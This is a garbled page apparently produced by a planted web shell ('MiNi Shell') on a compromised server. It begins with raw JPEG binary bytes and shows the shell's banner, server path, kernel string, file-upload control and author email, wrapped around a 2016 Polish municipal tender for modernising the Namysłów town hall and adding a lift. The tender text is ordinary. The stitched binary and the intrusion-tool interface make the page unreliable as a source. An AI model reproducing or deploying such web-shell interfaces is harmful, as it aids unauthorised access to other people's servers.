JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160411/83548-N-2016.html

<p class="kh_header"><b>Namysłów: Modernizacja Urzędu Miejskiego wraz z budową windy</b><br>
<b>Numer ogłoszenia: 83548 - 2016; data zamieszczenia: 11.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa , ul. Stanisława Dubois 3, 46-100 Namysłów, woj. opolskie, tel. 077 4190359, faks 077 4104841.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.namyslow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Urzędu Miejskiego wraz z budową windy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa i kod wg Wspólnego Słownika Zamówień: Roboty budowlane - 45000000-7. Roboty remontowe i renowacyjne - 45453000-7. Roboty instalacyjne elektryczne - 45310000-3. Roboty instalacyjne wodno-kanalizacyjne i sanitarne - 45330000-9. Zakres zadania przewiduje modernizację Urzędu Miejskiego wraz z budową windy wg projektu budowlanego p.n.: budowa windy do czterokondygnacyjnego budynku B Urzędu Miejskiego w Namysłowie z przebudową pomieszczeń na parterze i rozbudową łącznika, na podstawie zatwierdzonego projektu budowlanego i pozwolenia na budowę z dnia 04.03.2013 r. (decyzja nr AB.6740.1.50.2013, wydana przez Starostę Namysłowskiego). Szczegółowy opis robót wg projektu budowlanego. 1. Roboty rozbiórkowe: a) wykucie drzwi i okien z muru z cegły, b) rozbiórka pokrycia z papy na dachu betonowym, c) rozbiórka ścian z cegły na zaprawie cementowo-wapiennej, d) rozbiórka elementów żelbetowych (ława, schody wewnętrzne, posadzki, strop łącznika), e) odbicie tynków wewnętrznych na ścianach i sufitach, f) wywóz gruzu, g) utylizacja papy. 2. Przygotowanie konstrukcji pod montaż windy, montaż windy osobowej: a) roboty betonowe - przygotowanie podszybia żelbetowego, b) roboty izolacyjne przeciwwilgociowe poziome i pionowe z roztworu asfaltowego i papy zgrzewalnej jednowarstwowo, c) montaż stalowej konstrukcji nośnej szybu, d) szklenie ram szybu szybami ze szkła panoramicznego, e) osadzenie drabin podszybia ze stali nierdzewnej, f) montaż windy osobowej hydraulicznej o udźwigu min. 630 kg/8 osób. 3. Roboty fundamentowe: a) wykopy pod ławy fundamentowe i podkłady betonowe, b) podkłady betonowe na podłożu gruntowym, c) uzupełnienie ław fundamentowych betonowych + izolacja przeciwwilgociowa pozioma z roztworu asfaltowego i papy zgrzewalnej jednowarstwowo, d) ławy fundamentowe z bloczków betonowych + izolacja przeciwwilgociowa bitumiczna z dwóch warstw roztworu asfaltowego, e) izolacja cieplna ze styroduru grubość 5 cm. 4. Schody na gruncie i posadzki: a) schody żelbetowe na gruncie, b) podkłady betonowe grubość 10 cm na podłożu gruntowym, c) izolacje poziome przeciwwilgociowe z polimerowo-asfaltowej papy zgrzewalnej na osnowie z włókniny poliestrowej, dwukrotnie, d) izolacje cieplne z płyt styropianowych EPS 100-038 grubość 10 cm, e) izolacje poziome przeciwwilgociowe podpłytkowe z polimerowej masy uszczelniającej, f) izolacje poziome przeciwwilgociowe i przeciwwodne z folii polietylenowej grubość 0,2 mm, g) warstwa betonu konstrukcyjnego grubość 8 cm zbrojona siatką, h) podkład pod posadzki z masy samopoziomującej, i) posadzki (kolorystyka do ustalenia z Zamawiającym): wykładzina rulonowa PCV heterogeniczna kalandrowana klejona do podłoża, z wykończeniem listwami przypodłogowymi z twardego PCV, grubość 2 mm, z warstwą ścieralną min. 0,3 mm, grupa odporności na ścieranie T, klasa wykładziny 31; płytki ceramiczne gresowe grubość min. 8 mm, gatunek I, klasa twardości min. 6, ścieralność IV-V klasy, nasiąkliwość poniżej 0,1 %. 5. Ściany: a) ściany zewnętrzne grubość 38 cm z pustaków ceramicznych POROTHERM P+W, b) ścianki działowe grubość 11,5 cm i 18,8 cm z pustaków ceramicznych POROTHERM P+W, c) uzupełnienie i zamurowanie otworów w ścianach wewnętrznych cegłą ceramiczną pełną, d) ścianki ustępowe HPL grubość 12 mm na konstrukcji aluminiowej, e) nadproża systemowe typu POROTHERM 11,5 i POROTHERM 23,8  i stalowe profilowane, f) impregnacja przeciwsolna ścian, g) tynki wewnętrzne ścian i sufitów gipsowe jednowarstwowe, h) licowanie ścian płytkami ceramicznymi na kleju, i) tynki zewnętrzne, dekoracyjne, akrylowe, j) malowanie tynków wewnętrznych farbą akrylową, k) malowanie elewacji farbą silikatową. 6. Stropy, dach nad łącznikiem: a) strop żelbetowy, b) podciągi żelbetowe, c) izolacje poziome przeciwwilgociowe z folii polietylenowej grubość 0,2 mm, d) izolacje cieplne z płyt styropianowych EPS 200-038 grubość 15 cm, e) warstwa wyrównawcza betonowa na stropie grubość 5 cm, f) pokrycie dachu papą termozgrzewalną modyfikowaną grubość 4,7 mm, dwuwarstwowo, g) rynny, rury spustowe, obróbki blacharskie z blachy tytanowo-cynkowej grubość 0,7 mm, h) kanały wentylacyjne z nasadą, i) daszek systemowy ze stali kwasoodpornej ze szkłem bezpiecznym laminowanym VSG. 7. Stolarka okienna i drzwiowa: a) montaż okien dwudzielnych, uchylno-rozwieranych z PCV koloru białego, o profilu prostym min. pięciokomorowym, szklonych szkłem bezpiecznym podwójnym, P-2 typu float, o współczynniku przenikania ciepła U mniejsze równe 0,90 kW/m2 (oznaczenie wg projektu O1), b) montaż wewnętrznej ścianki szklanej, aluminiowej, szklonych szkłem bezpiecznym podwójnym, P-2 typu float, koloru białego (oznaczenie wg projektu O2), b) montaż drzwi zewnętrznych (wejściowych do przedsionka) i wewnętrznych (przedsionek - hall i przedsionek/poczekalnia), aluminiowych z przekładką termiczną, przeszklonych szkłem bezpiecznym podwójnym P2 typu float, o współczynniku przenikania ciepła U mniejsze równe 1,30 kW/m2, koloru białego (oznaczenie wg projektu D4, D5 i D6), c) montaż drzwi zewnętrznych (wejściowych do pomieszczenia gospodarczego), stalowe z przekładką termiczną, o współczynniku przenikania ciepła U mniejsze równe 1,30 kW/m2, koloru brązowego (oznaczenie wg projektu D3), d) montaż drzwi wewnętrznych, wejściowych do pomieszczeń biurowych i toalet, drewnianych płytowych, koloru ciemny brąz (oznaczenie wg projektu D1 i D2), e) montaż drzwi wewnętrznych (przejście z łącznika do korytarza), aluminiowych, przesuwnych, przeszklonych szkłem bezpiecznym podwójnym P2 typu float, o współczynniku przenikania ciepła U mniejsze równe 1,30 kW/m2 , koloru białego (oznaczenie wg projektu D7), f) obsadzenie wewnętrznych podokienników - konglomeraty z PCV, g) obsadzenie zewnętrznych podokienników z blachy tytanowo-cynkowej, h) montaż wycieraczki do obuwia. 8. Instalacje sanitarne wg projektu budowlanego. 9. Instalacja elektryczna wg projektu budowlanego. Przed złożeniem oferty można zapoznać się z obiektem objętym przedmiotem zamówienia w celu sporządzenia należytej wyceny. Wykonawca robót zobowiązuje się do: uzyskania protokołów badań i sprawdzeń; wywozu odpadów i gruzu poza teren budowy na składowisko odpadów; w razie konieczności uzyskania wszystkich niezbędnych uzgodnień branżowych, protokołów badań i sprawdzeń oraz poniesienia kosztów z tym związanych; przedstawienia aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane materiały budowlane i instalacyjne; zapłaty za dostawę energii elektrycznej, gazu, wody i odbiór ścieków w trakcie wykonywania robót budowlanych; wykonania robót budowlanych zgodnie z Warunkami Technicznymi Wykonania i Odbioru Robót Budowlano-Montażowych, Polskimi Normami; uzyskania w Powiatowym Inspektoracie Nadzoru Budowlanego w Namysłowie ostatecznej decyzji
o pozwoleniu na użytkowanie części rozbudowanej obiektu; wykonanie inwentaryzacji geodezyjnej powykonawczej. Załączony przedmiar robót należy traktować jako materiał pomocniczy przy sporządzaniu oferty. Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 15.000,00 zł (słownie złotych: piętnaście tysięcy 00/100). Okres ważności wadium musi obejmować cały okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże wykonanie co najmniej  dwie  roboty budowlane 
w budynkach użyteczności publicznych, o wartości co najmniej 600.000,00 zł brutto każda oraz co najmniej montaż jednej windy osobowej w dowolnym budynku. Do wykazanych pozycji muszą być załączone dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane 
w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone. Za najważniejsze roboty uznaje się roboty niezbędne do wykazania spełnienia warunku 
tj. co najmniej dwóch  robót budowlanych w budynkach użyteczności publicznych, o wartości co najmniej 600.000,00 zł brutto każda oraz 
co najmniej montaż jednej windy osobowej w dowolnym budynku. 
Do przeliczenia wartości określonej w niniejszym punkcie, a występującej 
w innej walucie niż złoty (PLN), Zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia 
o zamówieniu w Biuletynie Zamówień Publicznych. Zamawiający dokona oceny spełnienia powyższych warunków oraz przesłanek braku podstaw 
do wykluczenia z postępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp, na podstawie złożonych (przez Wykonawcę, podmioty występujące wspólnie) dokumentów wymienionych w punkcie 6 specyfikacji istotnych warunków zamówienia według formuły spełnia - nie spełnia. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 
do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, z podaniem zakresu dostępnych Wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje  kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, która będzie uczestniczyć w wykonywaniu zamówienia. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej musi dysponować osobą posiadającą kwalifikacje do kierowania robotami w specjalności konstrukcyjno-budowlanej, w kraju siedziby lub zamieszkania, jeśli takie obowiązują w danym kraju. Zamawiający dokona oceny spełnienia powyższych warunków oraz przesłanek braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp, na podstawie złożonych (przez Wykonawcę, podmioty występujące wspólnie) dokumentów wymienionych w punkcie 6 specyfikacji istotnych warunków zamówienia według formuły spełnia - nie spełnia. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, z podaniem zakresu dostępnych Wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalna jest zmiana postanowień umowy: Wykonawca może: 1) powierzyć realizację części zamówienia podwykonawcom, mimo nie wskazania w ofercie takiej części do powierzenia podwykonawcom, 2) wskazać inny zakres podwykonawstwa niż przedstawiony w złożonej ofercie, 3) wskazać innych podwykonawców niż przedstawieni w złożonej ofercie, 4) zrezygnować z
podwykonawstwa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.namyslow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia dostępna będzie w siedzibie Zamawiającego, budynek B, pok. nr 26 lub za zaliczeniem pocztowym. Siwz jest odpłatna (36,60 zł).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2016 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego - Urząd Miejski w Namysłowie,
ul. Dubois 3, budynek A, w sekretariacie, pokój Nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com